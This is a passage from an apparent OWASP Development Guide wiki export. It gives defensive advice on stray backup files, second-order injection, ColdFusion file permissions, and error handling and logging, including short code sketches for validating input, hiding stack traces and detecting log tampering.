* Temporary files (such as core, ~foo, blah.tmp, and so on) created by editors or crashed programs&lt;br /&gt;
&lt;br /&gt;
* Folders called “backup” “old” or “Copy of …”&lt;br /&gt;
&lt;br /&gt;
* Files with additional extensions, such as foo.php.old&lt;br /&gt;
&lt;br /&gt;
* Temporary folders with intermediate results or cache templates&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use source code control to prevent the need to keep old copies of files around&lt;br /&gt;
&lt;br /&gt;
* Periodically ensure that all files in the web root are actually required&lt;br /&gt;
&lt;br /&gt;
* Ensure that the application’s temporary files are not accessible from the web root&lt;br /&gt;
&lt;br /&gt;
==Second Order Injection ==&lt;br /&gt;
&lt;br /&gt;
If the web application creates a file that is operated on by another process, typically a batch or scheduled process, the second process may be vulnerable to attack. It is a rare application that ensures input to background processes is validated prior to first use.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application use background / batch / scheduled processes to work on user supplied data?&lt;br /&gt;
&lt;br /&gt;
* Does this program validate the user input prior to operating on it?&lt;br /&gt;
&lt;br /&gt;
* Does this program communicate with other business significant processes or otherwise approve transactions? &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure that all behind-the-scenes programs check user input prior to operating on it&lt;br /&gt;
&lt;br /&gt;
* Run the application with the least privilege – in particular, the batch application should not require write privileges to any front end files, the network, or similar&lt;br /&gt;
&lt;br /&gt;
* Use inbuilt language or operating system features to curtail the resources and features which the background application may use. For example, batch programs rarely if ever require network access. &lt;br /&gt;
&lt;br /&gt;
* Consider the use of host based intrusion detection systems and anti-virus systems to detect unauthorized file creation. &lt;br /&gt;
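&lt;br /&gt;
The first point can be sketched in PHP: the batch side re-validates every record before acting on it, instead of trusting that the web tier already did. The record format (numeric account id, comma, decimal amount) and the helper names are illustrative assumptions:&lt;br /&gt;

```php
// Accept only records matching the expected known-good format.
function validRecord($sLine) {
    return preg_match('/^\d{1,10},\d{1,9}\.\d{2}$/', $sLine) === 1;
}

// The batch job skips anything that fails validation.
function processBatch($sPath) {
    foreach (file($sPath) as $sLine) {
        if (!validRecord(trim($sLine))) {
            continue;   // log and skip -- never operate on unvalidated input
        }
        // ... act on the validated record ...
    }
}
```

Because the batch process validates independently, a record smuggled past the front end still cannot inject commands or malformed data into the back-office flow.&lt;br /&gt;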
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Klein, A., ''Insecure Indexing''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.webappsec.org/projects/articles/022805-clean.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* MySQL world readable log files&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/advisories/3803&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Oracle 8i and 9i Servlet allows remote file viewing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://online.securityfocus.com/advisories/3964&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
==File System ==&lt;br /&gt;
&lt;br /&gt;
Even with an authentication system in place to protect your content, if file permissions are set incorrectly an attacker could browse directly to your application source code or protected documents.  The section below gives guidance in setting file system permissions and directories to reduce your risk of exposure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Permissions'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Restrict access to the \CFIDE directory to specific IP addresses and user groups/accounts.&lt;br /&gt;
&lt;br /&gt;
Remove the \cfdocs directory. Sample applications are installed by default in the cfdocs directory and are accessible to anyone. These applications should never be available on a production server.&lt;br /&gt;
&lt;br /&gt;
Ensure that directory browsing is disabled.&lt;br /&gt;
&lt;br /&gt;
Ensure that proper access controls are set on web application content. The following settings assume a user account called “cfuser” has been created to run the ColdFusion service.  In addition, if you are using a directory or operating system authentication service, these settings may need to be adjusted.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Scripts (.cfm, .cfml, .cfc, .jsp, and others)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Execute); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Static content (.txt, .gif, .jpg, .html, .xml)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Read); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Upload'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upload files to a destination outside of the web application directory.&lt;br /&gt;
&lt;br /&gt;
Enable virus scan on the destination directory.&lt;br /&gt;
&lt;br /&gt;
Do not allow user input to specify the destination directory or file name of uploaded documents.&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:File System]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59849</id>
		<title>Error Handling, Auditing and Logging</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Error_Handling,_Auditing_and_Logging&amp;diff=59849"/>
				<updated>2009-05-02T11:04:08Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Error Handling and Logging */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
Many industries are required by legal and regulatory requirements to be:&lt;br /&gt;
&lt;br /&gt;
* Auditable – all activities that affect user state or balances are formally tracked&lt;br /&gt;
&lt;br /&gt;
* Traceable – it’s possible to determine where an activity occurs in all tiers of the application&lt;br /&gt;
&lt;br /&gt;
* High integrity – logs cannot be overwritten or tampered with by local or remote users&lt;br /&gt;
&lt;br /&gt;
Well-written applications will dual-purpose logs and activity traces for audit and monitoring, and make it easy to track a transaction without excessive effort or access to the system. They should possess the ability to easily track or identify potential fraud or anomalies end-to-end.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed, but in particular:&lt;br /&gt;
&lt;br /&gt;
DS11.4 Source data error handling&lt;br /&gt;
&lt;br /&gt;
DS11.8 Data input error handling&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
Error handling, debug messages, auditing and logging are different aspects of the same topic: how to track events within an application.&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
==Best practices ==&lt;br /&gt;
&lt;br /&gt;
* Fail safe – do not fail open&lt;br /&gt;
&lt;br /&gt;
* Dual purpose logs&lt;br /&gt;
&lt;br /&gt;
* Audit logs are legally protected – protect them&lt;br /&gt;
&lt;br /&gt;
* Report on and search logs using a read-only copy or a complete replica &lt;br /&gt;
&lt;br /&gt;
==Error Handling ==&lt;br /&gt;
&lt;br /&gt;
Error handling takes two forms: structured exception handling and functional error checking. Structured exception handling is always preferred, as it makes it easier to cover 100% of code. In languages without exceptions, such as PHP 4, it is very hard to cover 100% of all errors: code that does so is extraordinarily verbose and difficult to read, and can contain subtle bugs and errors in the error handling code itself.&lt;br /&gt;
&lt;br /&gt;
Motivated attackers like to see error messages as they might leak information that leads to further attacks, or may leak privacy related information. Web application error handling is rarely robust enough to survive a penetration test. &lt;br /&gt;
&lt;br /&gt;
Applications should always fail safe. If an application fails to an unknown state, it is likely that an attacker may be able to exploit this indeterminate state to access unauthorized functionality, or worse create, modify or destroy data.&lt;br /&gt;
&lt;br /&gt;
===Fail safe ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s fatal error handler.&lt;br /&gt;
&lt;br /&gt;
* Does it fail safe? If so, how?&lt;br /&gt;
&lt;br /&gt;
* Is the fatal error handler called frequently enough?&lt;br /&gt;
&lt;br /&gt;
* What happens to in-flight transactions and ephemeral data?&lt;br /&gt;
&lt;br /&gt;
===Debug errors ===&lt;br /&gt;
&lt;br /&gt;
* Does production code contain debug error handlers or messages?  &lt;br /&gt;
&lt;br /&gt;
* If the language is a scripting language without effective pre-processing or compilation, can the debug flag be turned on in the browser?&lt;br /&gt;
&lt;br /&gt;
* Do the debug messages leak privacy related information, or information that may lead to further successful attack?&lt;br /&gt;
&lt;br /&gt;
===Exception handling ===&lt;br /&gt;
&lt;br /&gt;
* Does the code use structured exception handlers (try {} catch {} etc) or function-based error handling? &lt;br /&gt;
&lt;br /&gt;
* If the code uses function-based error handling, does it check every return value and handle the error appropriately?&lt;br /&gt;
&lt;br /&gt;
* Would fuzz injection against the average interface fail? &lt;br /&gt;
&lt;br /&gt;
===Functional return values ===&lt;br /&gt;
&lt;br /&gt;
Many languages indicate an error condition by return value. E.g.:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$query = mysql_query("SELECT * FROM table WHERE id=4", $conn);&lt;br /&gt;
&lt;br /&gt;
if ( $query === false ) {&lt;br /&gt;
&lt;br /&gt;
		// error&lt;br /&gt;
&lt;br /&gt;
} &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Are all functional errors checked? If not, what can go wrong?&lt;br /&gt;
&lt;br /&gt;
==Detailed error messages ==&lt;br /&gt;
&lt;br /&gt;
Detailed error messages provide attackers with a mountain of useful information.&lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable  ===&lt;br /&gt;
&lt;br /&gt;
* Are detailed error messages turned on? &lt;br /&gt;
&lt;br /&gt;
* Do the detailed error messages leak information that may be used to stage a further attack, or leak privacy related information? &lt;br /&gt;
&lt;br /&gt;
* Does the browser cache the error message?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Ensure that your application has a “safe mode” to which it can return if something truly unexpected occurs. If all else fails, log the user out and close the browser window.&lt;br /&gt;
&lt;br /&gt;
Production code should not be capable of producing debug messages. If it does, debug mode should be triggered by editing a file or a configuration option on the server. In particular, debug mode should not be an option that can be enabled in the application itself.&lt;br /&gt;
&lt;br /&gt;
If the framework or language has a structured exception handler (i.e. try {} catch {}), it should be used in preference to functional error handling.&lt;br /&gt;
&lt;br /&gt;
If the application uses functional error handling, its use must be comprehensive and thorough.&lt;br /&gt;
&lt;br /&gt;
Detailed error messages, such as stack traces, and messages that leak privacy-related information should never be presented to the user. Use a generic error message instead. This also applies to HTTP status responses (e.g. 404 Not Found or 500 Internal Server Error).&lt;br /&gt;
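As an illustration of the advice above, here is a minimal, hypothetical Python sketch of a handler that keeps full details server-side and returns only a generic message with an opaque reference id (handle_request and server_log are assumed names, not part of any framework):&lt;br /&gt;

```python
import traceback
import uuid

server_log = []  # stands in for the server-side log file

def handle_request(fn):
    """Run fn; on any exception, log full details server-side and
    return only a generic message plus an opaque reference id."""
    try:
        return fn()
    except Exception:
        ref = uuid.uuid4().hex[:8]   # id to correlate a user report with the log entry
        server_log.append((ref, traceback.format_exc()))  # full detail stays server-side
        return "An internal error occurred (ref %s). Please try again later." % ref

msg = handle_request(lambda: 1 / 0)  # the stack trace never reaches the user
```

The reference id lets support staff find the full stack trace in the server log without ever exposing it to the browser.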
&lt;br /&gt;
==Logging ==&lt;br /&gt;
&lt;br /&gt;
===Where to log to? ===&lt;br /&gt;
&lt;br /&gt;
Logs should be written with file attributes set so that only new information can be written (older records cannot be rewritten or deleted). For added security, logs should also be written to a write once / read many device such as a CD-R.&lt;br /&gt;
&lt;br /&gt;
Copies of log files should be made at regular intervals depending on volume and size (daily, weekly, monthly, etc.).  A common naming convention should be adopted with regards to logs, making them easier to index. Verification that logging is still actively working is overlooked surprisingly often, and can be accomplished via a simple cron job!&lt;br /&gt;
&lt;br /&gt;
Make sure data is not overwritten.&lt;br /&gt;
&lt;br /&gt;
Log files should be copied and moved to permanent storage and incorporated into the organization's overall backup strategy.&lt;br /&gt;
&lt;br /&gt;
Log files and media should be deleted and disposed of properly and incorporated into an organization's shredding or secure media disposal plan. Reports should be generated on a regular basis, including error reporting and anomaly detection trending.&lt;br /&gt;
&lt;br /&gt;
Be sure to keep logs safe and confidential even when backed up.&lt;br /&gt;
&lt;br /&gt;
===Handling ===&lt;br /&gt;
&lt;br /&gt;
Logs can be fed into real time intrusion detection and performance and system monitoring tools. All logging components should be synced with a timeserver so that all logging can be consolidated effectively without latency errors. This time server should be hardened and should not provide any other services to the network.&lt;br /&gt;
&lt;br /&gt;
Logs must not be manipulated or deleted while they are being analyzed.&lt;br /&gt;
&lt;br /&gt;
===General Debugging ===&lt;br /&gt;
&lt;br /&gt;
Logs are useful in reconstructing events after a problem has occurred, security related or not. Event reconstruction can allow a security administrator to determine the full extent of an intruder's activities and expedite the recovery process.&lt;br /&gt;
&lt;br /&gt;
===Forensics evidence ===&lt;br /&gt;
&lt;br /&gt;
Logs may in some cases be needed in legal proceedings to prove wrongdoing. In this case, the actual handling of the log data is crucial.&lt;br /&gt;
&lt;br /&gt;
===Attack detection ===&lt;br /&gt;
&lt;br /&gt;
Logs are often the only record that suspicious behavior is taking place; therefore, logs can sometimes be fed in real time directly into intrusion detection systems.&lt;br /&gt;
&lt;br /&gt;
===Quality of service ===&lt;br /&gt;
&lt;br /&gt;
Repeated polls can be logged so that network outages and server shutdowns are recorded, and the behavior can either be analyzed later on or a responsible person can take immediate action.&lt;br /&gt;
&lt;br /&gt;
===Proof of validity ===&lt;br /&gt;
&lt;br /&gt;
Application developers sometimes write logs to prove to customers that their applications are behaving as expected.&lt;br /&gt;
&lt;br /&gt;
* Required by law or corporate policies.&lt;br /&gt;
&lt;br /&gt;
* Logs can provide individual accountability in the web application system by tracking a user's actions.&lt;br /&gt;
&lt;br /&gt;
Corporate policy or local law may require, for example, that header information for all application transactions be saved. These logs must then be kept safe and confidential for six months before they can be deleted.&lt;br /&gt;
&lt;br /&gt;
The points above reflect different motivations and result in different requirements and strategies. This means that before we can implement a logging mechanism in an application or system, we have to know the requirements and how the logs will later be used. Failing to do so can lead to unintended results.&lt;br /&gt;
&lt;br /&gt;
Failure to enable or design the proper event logging mechanisms in the web application may undermine an organization's ability to detect unauthorized access attempts, and the extent to which these attempts may or may not have succeeded. We will look into the most common attack methods, design and implementation errors, as well as the mitigation strategies later on in this chapter.&lt;br /&gt;
&lt;br /&gt;
There is another reason why the logging mechanism must be planned before implementation. In some countries, laws define what kinds of personal information are allowed to be not only logged but also analyzed. For example, in Switzerland, companies are not allowed to log personal information about their employees (such as what they do on the internet or what they write in their emails). So if a company wants to log a worker's surfing habits, it needs to inform her of the plan in advance.&lt;br /&gt;
&lt;br /&gt;
This leads to a requirement for anonymized or de-personalized logs, with the ability to re-personalize them later if need be. If an unauthorized person gains access to (legally) personalized logs, the corporation is acting unlawfully. So there are a few traps, not only legal ones, that must be kept in mind.&lt;br /&gt;
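One way to sketch such de-personalized logging (an illustration only; PEPPER and the mapping store are assumptions, and in practice the mapping would have to live under strict access control, held by an authorized party):&lt;br /&gt;

```python
import hashlib
import hmac

# Assumption: a secret key held only by the party authorized to re-personalize.
PEPPER = b"key-held-by-an-authorized-party"

# Pseudonym -> real identity, stored separately from the logs under access control.
mapping = {}

def pseudonymize(user):
    """Replace a user identity with a stable keyed pseudonym; the mapping
    is retained only where re-personalization is lawful."""
    tag = hmac.new(PEPPER, user.encode(), hashlib.sha256).hexdigest()[:12]
    mapping[tag] = user
    return tag

# The log line itself carries no personal information.
log_line = pseudonymize("alice") + " viewed /payroll"
```

Because the pseudonym is deterministic, log analysis (counting, correlating) still works, while only the holder of the mapping can recover the identity.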
&lt;br /&gt;
===Logging types ===&lt;br /&gt;
&lt;br /&gt;
Logs can contain different kinds of data. The selection of data is normally driven by the motivation for logging. This section describes the different types of logging information and the reasons why we might want to log them.&lt;br /&gt;
&lt;br /&gt;
In general, logging features should include appropriate debugging information such as the time of the event, the initiating process or its owner, and a detailed description of the event. The following are types of system events that can be logged in an application; which of them are used depends on the particular application or system and its needs:&lt;br /&gt;
&lt;br /&gt;
* Reading of data: log file access and what kind of data is read. This allows one to see not only whether data was read, but also by whom and when.&lt;br /&gt;
&lt;br /&gt;
* Writing of data: log also where and in what mode (append, replace) data was written. This can be used to see whether data was overwritten, or whether a program is writing at all.&lt;br /&gt;
&lt;br /&gt;
* Modification of any data characteristics, including access control permissions or labels, location in database or file system, or data ownership. Administrators can detect if their configurations were changed.&lt;br /&gt;
&lt;br /&gt;
* Administrative functions and changes in configuration regardless of overlap (account management actions, viewing any user's data, enabling or disabling logging, etc.)&lt;br /&gt;
&lt;br /&gt;
* Miscellaneous debugging information that can be enabled or disabled on the fly.&lt;br /&gt;
&lt;br /&gt;
* All authorization attempts (including time), such as success/failure, the resource or function being authorized, and the user requesting authorization. Password guessing can be detected with these logs, which can also be fed into an intrusion detection system that will detect anomalies.&lt;br /&gt;
&lt;br /&gt;
* Deletion of any data (object). Sometimes applications are required to have some sort of versioning in which the deletion process can be cancelled.&lt;br /&gt;
&lt;br /&gt;
* Network communications (bind, connect, accept, etc.). With this information an Intrusion Detection system can detect port scanning and brute force attacks.&lt;br /&gt;
&lt;br /&gt;
* All authentication events (logging in, logging out, failed logins, etc.), which also allow brute force and guessing attacks to be detected.&lt;br /&gt;
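As a sketch of how such authentication logs can feed detection, the following hypothetical Python fragment flags users with an unusually high number of failed logins inside a time window (the event format, names, and thresholds are all illustrative):&lt;br /&gt;

```python
from collections import Counter

# Toy auth log: (timestamp_seconds, user, outcome)
events = [
    (1, "alice", "failure"), (2, "alice", "failure"), (3, "alice", "failure"),
    (4, "alice", "failure"), (5, "bob", "success"), (6, "alice", "failure"),
]

def guessing_suspects(events, window=60, threshold=5):
    """Flag users with at least `threshold` login failures inside the
    trailing time window: a crude password-guessing detector."""
    last = events[-1][0]
    fails = Counter(user for t, user, outcome in events
                    if outcome == "failure" and last - t <= window)
    return sorted(user for user, n in fails.items() if n >= threshold)

suspects = guessing_suspects(events)  # alice has 5 recent failures
```

A real intrusion detection system would add per-source-IP counting and lockout or alerting, but the core signal is exactly this count of failures over time.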
&lt;br /&gt;
==Noise ==&lt;br /&gt;
&lt;br /&gt;
Noise is intentionally invoking security errors to fill an error log with entries (noise) that hide the incriminating evidence of a successful intrusion. When the administrator or a log parser application reviews the logs, there is every chance that they will write off the volume of log entries as a denial of service attempt rather than identify the 'needle in the haystack'.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
This is difficult, since applications usually offer an unimpeded route to functions capable of generating log events. If you can deploy an intelligent device or application component that can shun an attacker after repeated attempts, that would be beneficial. Failing that, use an error log audit tool that can reduce the bulk of the noise, for example based on repetition of events or on entries originating from the same source. It is also useful if the log viewer can display events in order of severity level, rather than only chronologically.&lt;br /&gt;
&lt;br /&gt;
==Cover Tracks ==&lt;br /&gt;
&lt;br /&gt;
The top prize in logging mechanism attacks goes to the contender who can delete or manipulate log entries at a granular level, &amp;quot;as though the event never even happened!&amp;quot;. Intrusion and deployment of rootkits allow an attacker to use specialized tools that assist or automate the manipulation of known log files. In most cases, log files can only be manipulated by users with root / administrator privileges, or via approved log manipulation applications. As a general rule, logging mechanisms should aim to prevent manipulation at a granular level, since an attacker who can manipulate individual entries can hide their tracks for a considerable length of time without being detected. A simple question: if you were compromised by an attacker, would the intrusion be more obvious if your log file were abnormally large or small, or if it looked like every other day's log?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Assign log files the highest security protection, providing reassurance that you always have an effective 'black box' recorder if things go wrong. This includes:&lt;br /&gt;
&lt;br /&gt;
*Applications should not run with Administrator, or root-level privileges. This is the main cause of log file manipulation success since super users typically have full file system access. Assume the worst case scenario and suppose your application is exploited. Would there be any other security layers in place to prevent the application's user privileges from manipulating the log file to cover tracks?&lt;br /&gt;
&lt;br /&gt;
*Ensuring that access privileges protecting the log files are restrictive, reducing the majority of operations against the log file to append and read.&lt;br /&gt;
&lt;br /&gt;
*Ensuring that log files are assigned object names that are not obvious and stored in a safe location of the file system.&lt;br /&gt;
&lt;br /&gt;
*Writing log files using publicly or formally scrutinized techniques in an attempt to reduce the risk associated with reverse engineering or log file manipulation.&lt;br /&gt;
&lt;br /&gt;
*Writing log files to read-only media (where event log integrity is of critical importance).&lt;br /&gt;
&lt;br /&gt;
*Use of hashing technology to create digital fingerprints. The idea is that if an attacker does manipulate the log file, the digital fingerprint will no longer match and an alert will be generated.&lt;br /&gt;
&lt;br /&gt;
*Use of host-based IDS technology where normal behavioral patterns can be 'set in stone'. Attempts by attackers to update the log file through anything but the normal approved flow would generate an exception and the intrusion can be detected and blocked. This is one security control that can safeguard against simplistic administrator attempts at modifications.&lt;br /&gt;
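The digital-fingerprint idea above can be sketched as a hash chain over log lines: each line's digest feeds into the next, so altering any earlier entry changes the final fingerprint (illustrative Python; a production scheme would use a keyed HMAC and protect the key and the stored fingerprint):&lt;br /&gt;

```python
import hashlib

def fingerprint(lines):
    """Chain each line's SHA-256 digest into the next, so that altering
    any earlier line changes the final fingerprint."""
    digest = b""
    for line in lines:
        digest = hashlib.sha256(digest + line.encode()).digest()
    return digest.hex()

log = ["user=alice action=login", "user=alice action=view report"]
original = fingerprint(log)          # stored separately from the log itself

# An attacker rewrites an entry to cover their tracks...
tampered = fingerprint(["user=alice action=login",
                        "user=alice action=view nothing"])
# ...and the fingerprints no longer match, triggering an alert.
```

Storing the running fingerprint on a separate, hardened system is what makes the mismatch detectable even if the log host is compromised.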
&lt;br /&gt;
==False Alarms ==&lt;br /&gt;
&lt;br /&gt;
Taking a cue from the classic 1966 film &amp;quot;How to Steal a Million&amp;quot;, or from Aesop's fable &amp;quot;The Boy Who Cried Wolf&amp;quot;, be wary of repeated false alarms: they may represent an attacker trying to fool the security administrator into thinking that the technology is faulty and not to be trusted until it can be fixed.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Simply be aware of this type of attack. Take every security violation seriously, always get to the bottom of the cause of event log errors, and don't dismiss errors unless you can be completely sure that you know them to be a technical problem.&lt;br /&gt;
&lt;br /&gt;
===Denial of Service ===&lt;br /&gt;
&lt;br /&gt;
An attacker can repeatedly hit an application with requests that cause log entries; multiply this by ten thousand, and the result is a large log file and a possible headache for the security administrator. Where log files are configured with a fixed allocation size, once they are full all logging will stop, and the attacker has effectively denied service to your logging mechanism. Worse still, if there is no maximum log file size, an attacker can completely fill the hard drive partition and potentially deny service to the entire system. This is becoming rarer, though, with the increasing size of today's hard disks.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
The main defenses against this type of attack are to increase the maximum log file size to a value that is unlikely to be reached, to place the log file on a separate partition from the operating system and other critical applications, and, best of all, to deploy a system monitoring application that can set a threshold on your log file size and/or activity and issue an alert if an attack of this nature is underway.&lt;br /&gt;
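The threshold-monitoring idea can be sketched as follows (illustrative Python; check_log_growth and its limits are assumptions, not a real monitoring product):&lt;br /&gt;

```python
def check_log_growth(samples, max_bytes=50_000_000, growth_limit=1_000_000):
    """samples: successive (timestamp_seconds, size_in_bytes) readings of a
    log file. Alert when the file reaches its size cap or grows at an
    abnormal rate (bytes per second), as during a log-flooding attack."""
    alerts = []
    for (t0, s0), (t1, s1) in zip(samples, samples[1:]):
        if s1 >= max_bytes:
            alerts.append((t1, "size cap reached"))
        elif (s1 - s0) / (t1 - t0) > growth_limit:
            alerts.append((t1, "abnormal growth rate"))
    return alerts

# A log that jumps to 400 MB within a minute trips the size cap.
alerts = check_log_growth([(0, 1_000), (60, 400_000_000)])
```

In practice such a check would run from cron or a monitoring agent and page an administrator; the point is simply to notice the attack before the partition fills.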
&lt;br /&gt;
==Destruction ==&lt;br /&gt;
&lt;br /&gt;
Following the same scenario as the denial of service above, if a log file is configured to cycle around, overwriting old entries when full, an attacker can do the evil deed and then set a log generation script into action in an attempt to eventually overwrite the incriminating log entries, thus destroying them.&lt;br /&gt;
&lt;br /&gt;
If all else fails, an attacker may simply choose to cover their tracks by purging all log file entries, assuming they have the privileges to perform such actions. This attack would most likely involve calling the log file management program and issuing the command to clear the log, or it may be easier to simply delete the object that is receiving log event updates (in most cases, this object will be locked by the application). This type of attack does make an intrusion obvious, assuming that log files are being regularly monitored, and it has a tendency to cause panic as system administrators and managers realize they have nothing upon which to base an investigation.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Following most of the techniques suggested above will provide good protection against this attack. Keep in mind two things:&lt;br /&gt;
&lt;br /&gt;
*Administrative users of the system should be well trained in log file management and review. 'Ad-hoc' clearing of log files is never advised, and an archive should always be taken. Too many times a log file is cleared, perhaps to assist with a technical problem, erasing the history of events that might have served a future investigation.&lt;br /&gt;
&lt;br /&gt;
*An empty security log does not necessarily mean that you should pick up the phone and fly the forensics team in. In some cases, security logging is not turned on by default and it is up to you to make sure that it is. Also, make sure it is logging at the right level of detail, and benchmark the errors against an established baseline in order to measure what is considered 'normal' activity.&lt;br /&gt;
&lt;br /&gt;
==Audit Trails ==&lt;br /&gt;
&lt;br /&gt;
Audit trails are legally protected in many countries, and should be logged into high integrity destinations to prevent casual and motivated tampering and destruction. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Do the logs transit in the clear between the logging host and the destination?&lt;br /&gt;
&lt;br /&gt;
* Do the logs have an HMAC or similar tamper-proofing mechanism to prevent changes from the time of the logging activity to when the logs are reviewed?&lt;br /&gt;
&lt;br /&gt;
* Can relevant logs be easily extracted in a legally sound fashion to assist with prosecutions?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Only audit truly important events – you have to keep audit trails for a long time, and debug or informational messages are wasteful&lt;br /&gt;
&lt;br /&gt;
* Log centrally as appropriate and ensure primary audit trails are not kept on vulnerable systems, particularly front end web servers&lt;br /&gt;
&lt;br /&gt;
* Only review copies of the logs, not the actual logs themselves&lt;br /&gt;
&lt;br /&gt;
* Ensure that audit logs are sent to trusted systems&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, use write-once media or similar to provide trustworthy long term log repositories&lt;br /&gt;
&lt;br /&gt;
* For highly protected systems, ensure there is end-to-end trust in the logging mechanism. World-writeable logs and logging agents without credentials (such as SNMP traps, syslog, etc.) may be legally excluded as evidence in a prosecution &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Oracle Auditing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sans.org/atwork/description.php?cid=738&amp;lt;/u&amp;gt;   [[category:FIXME|broken link]]&lt;br /&gt;
&lt;br /&gt;
* Sarbanes Oxley for IT security&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/columnists/322&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Java Logging Overview&lt;br /&gt;
&amp;lt;u&amp;gt;http://java.sun.com/javase/6/docs/technotes/guides/logging/overview.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Error Handling and Logging ==&lt;br /&gt;
&lt;br /&gt;
All applications have failures, whether they occur during compilation or at runtime. Most programming languages will throw runtime exceptions for illegally executing code (e.g. syntax errors), often in the form of cryptic system messages. If not handled properly, these failures and the resulting system messages can lead to several security risks, including enumeration, buffer attacks, and sensitive information disclosure. If an attack occurs, it is important that forensics personnel be able to trace the attacker’s tracks via adequate logging.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides structured exception handling and logging tools. These tools can help developers customize error handling to prevent unwanted disclosure, and provide customized logging for error tracking and audit trails. These tools should be combined with web server, J2EE application server, and operating system tools to create the full system/application security overview.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Error Handling'''&lt;br /&gt;
&lt;br /&gt;
Hackers can use the information exposed by error messages. Even missing template errors (HTTP 404) can expose your server to attacks (e.g. buffer overflow, XSS, etc.). If you enable the Robust Exception Information debugging option, ColdFusion will display:&lt;br /&gt;
&lt;br /&gt;
*Physical path of template &lt;br /&gt;
&lt;br /&gt;
*URI of template &lt;br /&gt;
&lt;br /&gt;
*Line number and line snippet &lt;br /&gt;
&lt;br /&gt;
*SQL statement used (if any) &lt;br /&gt;
&lt;br /&gt;
*Data source name (if any) &lt;br /&gt;
&lt;br /&gt;
*Java stack trace&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ColdFusion provides tags and functions for developers to use to customize error handling. Administrators can specify default templates in the ColdFusion Administrator (CFAM) to handle unknown or unhandled exceptions. ColdFusion’s structured exception handling works in the following order:&lt;br /&gt;
&lt;br /&gt;
*Template level (ColdFusion templates and components)&lt;br /&gt;
&lt;br /&gt;
**ColdFusion exception handling tags: cftry, cfcatch, cfthrow, and cfrethrow&lt;br /&gt;
&lt;br /&gt;
**try and catch statements in CFScript&lt;br /&gt;
